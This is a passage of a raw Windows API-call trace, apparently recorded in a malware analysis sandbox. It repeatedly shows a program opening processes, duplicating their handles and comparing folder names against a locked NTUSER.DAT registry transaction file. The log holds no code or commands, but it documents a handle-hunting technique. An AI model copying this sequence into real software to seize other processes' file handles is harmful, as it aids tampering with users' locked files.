lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.929] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.930] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.930] CloseHandle (hObject=0x1e4) returned 1 [0164.930] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.930] CloseHandle (hObject=0x194) returned 1 [0164.930] CloseHandle (hObject=0x1e8) returned 1 [0164.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e8 [0164.930] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.931] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.931] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.931] CloseHandle (hObject=0x1e4) returned 1 [0164.932] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.932] CloseHandle (hObject=0x194) returned 1 [0164.932] CloseHandle (hObject=0x1e8) returned 1 [0164.932] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e8 [0164.932] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.932] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.933] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.933] CloseHandle (hObject=0x1e4) returned 1 [0164.933] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.933] CloseHandle (hObject=0x194) returned 1 [0164.933] CloseHandle (hObject=0x1e8) returned 1 [0164.933] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d0) returned 0x1e8 [0164.933] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.934] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.935] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.935] CloseHandle (hObject=0x1e4) returned 1 [0164.935] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.935] CloseHandle (hObject=0x194) returned 1 [0164.935] CloseHandle (hObject=0x1e8) returned 1 [0164.935] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d0) returned 0x1e8 [0164.935] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.936] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.937] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.937] CloseHandle (hObject=0x1e4) returned 1 [0164.937] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.937] CloseHandle (hObject=0x194) returned 1 [0164.937] CloseHandle (hObject=0x1e8) returned 1 [0164.937] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x36c) returned 0x1e8 [0164.937] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.938] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.939] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.939] CloseHandle (hObject=0x1e4) returned 1 [0164.939] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.939] CloseHandle (hObject=0x194) returned 1 [0164.939] CloseHandle (hObject=0x1e8) returned 1 [0164.939] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x36c) returned 0x1e8 [0164.939] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.940] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.941] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.941] CloseHandle (hObject=0x1e4) returned 1 [0164.941] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.941] CloseHandle (hObject=0x194) returned 1 [0164.941] CloseHandle (hObject=0x1e8) returned 1 [0164.941] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e8 [0164.941] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.942] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.943] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.943] CloseHandle (hObject=0x1e4) returned 1 [0164.943] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.943] CloseHandle (hObject=0x194) returned 1 [0164.943] CloseHandle (hObject=0x1e8) returned 1 [0164.943] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e8 [0164.943] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.944] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.945] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.945] CloseHandle (hObject=0x1e4) returned 1 [0164.945] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.945] CloseHandle (hObject=0x194) returned 1 [0164.945] CloseHandle (hObject=0x1e8) returned 1 [0164.945] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x670) returned 0x1e8 [0164.945] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.946] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.947] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.947] CloseHandle (hObject=0x1e4) returned 1 [0164.947] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.947] CloseHandle (hObject=0x194) returned 1 [0164.947] CloseHandle (hObject=0x1e8) returned 1 [0164.947] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x670) returned 0x1e8 [0164.947] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.948] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.949] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.949] CloseHandle (hObject=0x1e4) returned 1 [0164.949] _wcsicmp (_Str1="\\Reference Assemblies", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0164.949] CloseHandle (hObject=0x194) returned 1 [0164.949] CloseHandle (hObject=0x1e8) returned 1 [0164.950] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x78c) returned 0x1e8 [0164.950] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.950] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.951] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.951] CloseHandle (hObject=0x1e4) returned 1 [0164.952] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.952] CloseHandle (hObject=0x194) returned 1 [0164.952] CloseHandle (hObject=0x1e8) returned 1 [0164.952] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x78c) returned 0x1e8 [0164.952] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.953] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.954] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.954] CloseHandle (hObject=0x1e4) returned 1 [0164.954] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0164.954] CloseHandle (hObject=0x194) returned 1 [0164.954] CloseHandle (hObject=0x1e8) returned 1 [0164.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c8) returned 0x1e8 [0164.954] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.955] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.956] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.956] CloseHandle (hObject=0x1e4) returned 1 [0164.956] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.956] CloseHandle (hObject=0x194) returned 1 [0164.956] CloseHandle (hObject=0x1e8) returned 1 [0164.956] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c8) returned 0x1e8 [0164.956] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.957] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.958] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.958] CloseHandle (hObject=0x1e4) returned 1 [0164.958] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.958] CloseHandle (hObject=0x194) returned 1 [0164.958] CloseHandle (hObject=0x1e8) returned 1 [0164.958] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1e8 [0164.958] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.959] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.960] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.960] CloseHandle (hObject=0x1e4) returned 1 [0164.960] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.960] CloseHandle (hObject=0x194) returned 1 [0164.960] CloseHandle (hObject=0x1e8) returned 1 [0164.961] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1e8 [0164.961] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.961] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.962] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.962] CloseHandle (hObject=0x1e4) returned 1 [0164.962] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.962] CloseHandle (hObject=0x194) returned 1 [0164.963] CloseHandle (hObject=0x1e8) returned 1 [0164.963] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7bc) returned 0x1e8 [0164.963] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.964] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.964] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.965] CloseHandle (hObject=0x1e4) returned 1 [0164.965] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.965] CloseHandle (hObject=0x194) returned 1 [0164.965] CloseHandle (hObject=0x1e8) returned 1 [0164.965] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7bc) returned 0x1e8 [0164.965] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.966] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.967] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.967] CloseHandle (hObject=0x1e4) returned 1 [0164.967] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.967] CloseHandle (hObject=0x194) returned 1 [0164.967] CloseHandle (hObject=0x1e8) returned 1 [0164.967] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x490) returned 0x1e8 [0164.967] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.968] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.968] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.969] CloseHandle (hObject=0x1e4) returned 1 [0164.969] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.969] CloseHandle (hObject=0x194) returned 1 [0164.969] CloseHandle (hObject=0x1e8) returned 1 [0164.969] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x490) returned 0x1e8 [0164.969] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.970] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.970] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.970] CloseHandle (hObject=0x1e4) returned 1 [0164.970] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0164.970] CloseHandle (hObject=0x194) returned 1 [0164.971] CloseHandle (hObject=0x1e8) returned 1 [0164.971] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6dc) returned 0x1e8 [0164.971] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.971] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.972] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.972] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.973] CloseHandle (hObject=0x1e4) returned 1 [0164.973] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.973] CloseHandle (hObject=0x194) returned 1 [0164.973] CloseHandle (hObject=0x1e8) returned 1 [0164.973] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6dc) returned 0x1e8 [0164.973] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.973] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.974] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.974] CloseHandle (hObject=0x1e4) returned 1 [0164.974] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.974] CloseHandle (hObject=0x194) returned 1 [0164.974] CloseHandle (hObject=0x1e8) returned 1 [0164.974] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x1e8 [0164.975] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.975] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.976] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.976] CloseHandle (hObject=0x1e4) returned 1 [0164.976] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.976] CloseHandle (hObject=0x194) returned 1 [0164.976] CloseHandle (hObject=0x1e8) returned 1 [0164.976] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x1e8 [0164.976] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.977] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.978] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.978] CloseHandle (hObject=0x1e4) returned 1 [0164.978] _wcsicmp (_Str1="\\Microsoft Visual Studio 8", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.978] CloseHandle (hObject=0x194) returned 1 [0164.978] CloseHandle (hObject=0x1e8) returned 1 [0164.978] 